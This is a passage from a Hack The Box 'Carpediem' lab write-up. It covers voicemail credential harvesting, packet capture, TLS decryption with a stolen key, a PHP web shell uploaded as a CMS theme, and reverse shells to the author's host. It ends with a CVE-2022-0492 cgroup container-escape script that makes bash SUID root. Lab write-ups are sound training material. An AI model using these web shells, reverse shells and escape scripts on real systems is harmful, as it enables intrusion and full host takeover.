"<p>Hey Adeanna,<br>I think Joey is out this week, but I can take care of this. Whats the last 4 digits of his employee ID so I can get his extension set up in the VoIP system?</p>\n"
"<p>Thanks Robert,<br>Last 4 of employee ID is 9650.</p>\n"
"<p>Thank you! He&#39;s all set up and ready to go. When he gets to the office on his first day just have him log into his phone first. I&#39;ll leave him a voicemail with his initial credentials for server access. His phone pin code will be 2022 and to get into voicemail he can dial *62</p>\n<p>Also...let him know that if he wants to use a desktop soft phone that we&#39;ve been testing Zoiper with some of our end users.</p>\n<p>Changing the status of this ticket to pending until he&#39;s been set up and changes his initial credentials.</p>\n"
"<p>You&#39;re hopelss, man.  Utterly hopeless.</p>\n<p>I&#39;m closing this ticket.</p>\n"
"<p>Thanks, Jeremy.  I agree.  This is a big problem.</p>\n"
```

Since all the data is present in mongo, we could have used it too:

```console
opcode@parrot$ proxychains ./mongosh --host 172.17.0.3 --port 27017
test> use trudesk
trudesk> db.tickets.find().pretty()
trudesk> db.notifications.find().pretty()
```

But mongo kept dying periodically, and that was annoying.

## Zoiper - Free VoIP SIP softphone dialer

Getting back to the ticket, we have some info about a new employee who has yet to join.  
We know that the employee's name is **Horace Flaccus**, and following their conventions, his username should be **hflaccus**  
The last four digits of his employee ID are **9650**, and he received a voicemail with initial credentials.  
The temporary phone pin assigned to him is **2022**, and he can dial `*62` to get to his voicemail.  
Plus, **Zoiper** can be used as a desktop softphone.

Zoiper is an application which can be used to make telephone calls over the Internet using a general-purpose computer rather than dedicated hardware.  
We can download it from <https://www.zoiper.com/en/voip-softphone/download/current>.

After installation, it asks for username and password. After some hit-and-trial, I found the following pair works:

```text
9650:2022
```

![10](images/10.png)

![11](images/11.png)

I went with the default settings for the rest of the process:

![12](images/12.png)

Now, we can dial `*62`:

![13](images/13.png)

Once the call connects, we are asked for a password. We can press 2022 on the keypad and receive the voicemail from Robert.  

![14](images/14.png)

The password is:

```text
AuRj4pxq9qPk
```

`hflaccus:AuRj4pxq9qPk` did not work on the backdrop CMS on <https://172.17.0.2>  
But it works for SSH:

```console
opcode@parrot$ sshpass -p 'AuRj4pxq9qPk' ssh -o StrictHostKeyChecking=no hflaccus@carpediem.htb
```

## `tcpdump` with `cap_net_admin` and `cap_net_raw` capabilities

Running `linpeas.sh` on the box results in an interesting find:

![15](images/15.png)

`tcpdump` has some interesting capabilities. It means we should be able to capture packets across all interfaces on the box.  
I decided to let it run for 10 minutes:

```console
hflaccus@carpediem:~$ tcpdump -i any -w opcode.pcap
```

After 10 minutes, we can kill it with Ctrl+C and transfer the pcap to our machine.  
Now, we can inspect it in Wireshark:

![16](images/16.png)

A lot is going on, but we can hopefully ignore SSH packets and DNS packets and also filter out requests involving the IPs: 172.17.0.5 (trudesk), 172.17.0.3 (mongo) and 172.17.0.6 (motorcycle portal).  
We can also add similar filters to avoid google DNS requests and stray requests from our IP:

```text
not(dns) and not(ssh) and ip.src != 172.17.0.5 and ip.src != 172.17.0.3 and ip.src != 172.17.0.6 and ip.dst != 8.8.8.8 and ip.src != 10.10.14.44 and ip.dst != 10.10.14.44
```

That leaves us with some conversations between 172.17.0.1 (docker host) and 172.17.0.2 (backdrop CMS).  
Unfortunately, it is HTTPS traffic, and hence TLS encrypted.

## TLS Decryption using an RSA private key

This is where `linpeas.sh` helps us once again:

![17](images/17.png)

We can grab the key and transfer it to our machine.  
Then I found this TLS Decryption section in the Wireshark wiki: <https://wiki.wireshark.org/TLS#tls-decryption>  
And the protocol used in our case is TLS 1.0, so the RSA private key approach is likely to work.

In Wireshark, I added the key to Edit > Preferences > Protocols > TLS > RSA Key List  
After the requests of interest got decrypted, we can filter those with:

```text
tls and ip.src == 172.17.0.1 and http
```

We'd find a bunch of GET and POST requests.  
The POST requests are interesting:

```http
POST /?q=user/login HTTP/1.1
Host: backdrop.carpediem.htb:8002
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Origin: https://backdrop.carpediem.htb:8002
Content-Type: application/x-www-form-urlencoded
Referer: https://backdrop.carpediem.htb:8002/?q=user/login
Accept-Language: en-US,en;q=0.9
Content-Length: 128

name=jpardella&pass=tGPN6AmJDZwYWdhY&form_build_id=form-rXfWvmvOz0ihcfyBBwhTF3TzC8jkPBx4LvUBrdAIsU8&form_id=user_login&op=Log+in
```

They leak the credentials:

```text
jpardella:tGPN6AmJDZwYWdhY
```

Looking at the User-Agent, we can conclude that it is a python script running through cron.  
But when I transferred `pspy` to the box, I could not find any cron job. It was because `/proc` was mounted with `hidepid=2` option:

```console
hflaccus@carpediem:~$ cat /proc/mounts | grep '/proc '
proc /proc proc rw,nosuid,nodev,noexec,relatime,hidepid=2 0 0
```

## RCE on Backdrop CMS with a malicious theme

The credentials did not work for SSH, but they work for Backdrop CMS, as expected:

```console
opcode@parrot$ proxychains firefox https://172.17.0.2
```

![18](images/18.png)

The version is 1.21.4, and I could not find any CVE for this version. It means we would have to exploit a feature of this CMS, which is not necessarily a bug.  
Searching for exploits for this CMS, only this one comes up:  <https://www.exploit-db.com/exploits/50323>  
The exploit script also has an URL to the author's GitHub: <https://github.com/V1n1v131r4/CSRF-to-RCE-on-Backdrop-CMS>  

On the GitHub page, he explains that his payload forces the site to install the plugin when called via the browser. In this way, when accessed by the site's admin, the `shell.php` file will be available for use by the attacker.  
We do not have the CSRF vulnerability here, but since we are admin, we should be able to upload any plugin (module) legitimately. The malicious plugin is available in the "Releases" section.

It was what I used when I initially did the box. It sadly breaks the website for others sharing the instance.  
Instead, we can grab a functional theme like <https://github.com/backdrop-contrib/shasetsu>, add a malicious `shell.php` file and pack it again:

```console
opcode@parrot$ unzip shasetsu.zip
opcode@parrot$ cd shasetsu
opcode@parrot$ echo "<?php system(\$_GET['cmd']);?>" > shell.php
opcode@parrot$ cd ..
opcode@parrot$ zip -r shasetsu.zip shasetsu
```

The page for installing modules (<https://172.17.0.2/?q=admin/modules/install>) also links to a manual install page: <https://172.17.0.2/?q=admin/installer/manual>  
We can upload `shasetsu.zip` there.

![19](images/19.png)

Next, we can check for RCE by visiting <https://172.17.0.2/themes/shasetsu/shell.php?cmd=id>

We can grab a shell by visiting:

```text
https://172.17.0.2/themes/shasetsu/shell.php?cmd=echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNDQvOTAwMSAgMD4mMScK | base64 -d | bash
```

We can now upgrade the shell with `script` as `python` is not present on this box:

```console
www-data@90c7f522b842:/tmp$ script /dev/null -c bash
www-data@90c7f522b842:/tmp$ ^Z
opcode@parrot$ stty raw -echo; fg
www-data@90c7f522b842:/tmp$ export TERM=xterm-256color
www-data@90c7f522b842:/tmp$ exec /bin/bash
```

## Elevating privileges with a root cron job

On this container, the result of `pspy` is somewhat chaotic. But this process is the one that matters:

```text
2022/07/01 11:13:01 CMD: UID=0    PID=2702   | /usr/sbin/cron -P 
2022/07/01 11:13:01 CMD: UID=0    PID=2703   | /bin/sh -c sleep 45; /bin/bash /opt/heartbeat.sh 
```

It is a cron job running a bash script as root.  
The contents of `/opt/heartbeat.sh`:

```bash
#!/bin/bash
#Run a site availability check every 10 seconds via cron
checksum=($(/usr/bin/md5sum /var/www/html/backdrop/core/scripts/backdrop.sh))
if [[ $checksum != "70a121c0202a33567101e2330c069b34" ]]; then
  exit
fi
status=$(php /var/www/html/backdrop/core/scripts/backdrop.sh --root /var/www/html/backdrop https://localhost)
grep "Welcome to backdrop.carpediem.htb!" "$status"
if [[ "$?" != 0 ]]; then
  #something went wrong.  restoring from backup.
  cp /root/index.php /var/www/html/backdrop/index.php
fi
```

It first verifies that the `md5sum` of `/var/www/html/backdrop/core/scripts/backdrop.sh` is what it expects and then runs the rest of the commands every 10 seconds.  
We don't have the privilege to modify this file.  
Next, it runs `backdrop.sh` against `/var/www/html/backdrop` and if the string "Welcome to backdrop.carpediem.htb!" is not in `index.php`, it restored the `/var/www/html/backdrop/index.php` file from backup.

`backdrop.sh` seems like another extension for Backdrop CMS which can execute a PHP page directly from the shell. It sounds elegant.

```console
www-data@90c7f522b842:/tmp$ ls -la /var/www/html/backdrop/index.php 
-rw-r--r-- 1 www-data www-data 578 Dec  3 04:33 /var/www/html/backdrop/index.php
```

We own this `index.php`; we can write arbitrary PHP in it as we desire, and `backdrop.sh` would execute it as root.

```console
www-data@90c7f522b842:/tmp$ echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.44/9001 0>&1'\");?>" > /var/www/html/backdrop/index.php
```

We quickly get a shell on the container as root. We can upgrade the shell again:

```console
root@90c7f522b842:~# script /dev/null -c bash
root@90c7f522b842:~# ^Z
opcode@parrot$ stty raw -echo; fg
root@90c7f522b842:~# export TERM=xterm-256color
root@90c7f522b842:~# exec /bin/bash
```

## Container breakout with CVE-2022-0492

On HTB boxes, returning to a docker container from the host usually implies container breakout.  
We even have root on the container.

`deepce.sh` (<https://github.com/stealthcopter/deepce>) did not find anything other than the `CAP_DAC_OVERRIDE` privilege.  
But `CAP_DAC_OVERRIDE` needs `CAP_DAC_READ_SEARCH` with it for docker escape to be possible with `Shocker` (<https://github.com/gabrtv/shocker>)  
Even `cdk` (<https://github.com/cdk-team/CDK>) failed me.  
(Any alien file on this container gets deleted quickly. Files persist in `/dev/shm`, but `/dev/shm` has been mounted with `noexec` option)

```console
root@90c7f522b842:/tmp# uname -r
5.4.0-97-generic
```

The kernel version is `5.4.0-97-generic`

2022 has seen a bunch of container escape kernel exploits, e.g. CVE-2022-0185 (<https://www.willsroot.io/2022/01/cve-2022-0185.html>), CVE-2022-0847 (<https://dirtypipe.cm4all.com/>, <https://securitylabs.datadoghq.com/articles/dirty-pipe-container-escape-poc/>) and CVE-2022-0492 (<https://sysdig.com/blog/detecting-mitigating-cve-2022-0492-sysdig/>)  
I think all three should work on this box, but I was hinted to go for the third one as it has the easiest PoC.

When we run a `container`, Docker creates a set of `namespaces` for that `container`. These `namespaces` provide a layer of isolation. Each aspect of a `container` runs in a separate `namespace`, and its access is limited to that `namespace`.  
The docker engine on Linux also relies on another technology called control groups (`cgroups`). A `cgroup` limits an application to a specific set of resources.

A rather old way to escape containers is to use the `release_agent` file. This file defines a program that would run upon the termination of a process in the `cgroup`. When a process dies, the kernel checks whether its `cgroups` had `notify_on_release` enabled. If enabled, it spawns the related `release_agent` binary, running as root.  
Hence, if we can write to the `release_agent` file, we can force the kernel into running a binary of our choice with elevated privileges.  
But usually, it needs us to have the `CAP_SYS_ADMIN` capability.  
This article explains it much better: <https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/>

CVE-2022-0492 allows us to do it without the `CAP_SYS_ADMIN` capability. Essentially, we mount `cgroupfs` in a new namespace and edit the `release_agent` file.  
We can enter a new namespace with `unshare(CLONE_NEWNS|CLONE_NEWUSER)` and get `CAP_SYS_ADMIN` capability.

Sure, we can run `unshare -UrmC bash` and use the rest of the exploit from the "Trail of Bits" or the "sysdig" blog:

```bash
#!/usr/bin/bash

mkdir /tmp/cgrp
mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
 
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
 
echo '#!/bin/sh' > /cmd
echo "chmod u+s /usr/bin/bash" >> /cmd
chmod a+x /cmd
 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```

Transfer `exploit.sh` to `/dev/shm`. After that, we can run:

```console
root@90c7f522b842:/tmp# unshare -UrmC bash
root@90c7f522b842:/tmp# cp /dev/shm/exploit.sh . ;./exploit.sh
```

I also tried to use `./cdk run mount-cgroup`, but it did not work, likely because they are using the `memory` cgroup.

Now, we can get back to the `hflaccus`'s shell, and

```console
hflaccus@carpediem:~$ ls -la /usr/bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18  2022 /usr/bin/bash
```

It has the SUID bit set, so we can run bash with `-p` to not drop the effective user id:

```console
hflaccus@carpediem:~$ bash -p
bash-5.0# id
uid=1000(hflaccus) gid=1000(hflaccus) euid=0(root) groups=1000(hflaccus)
```
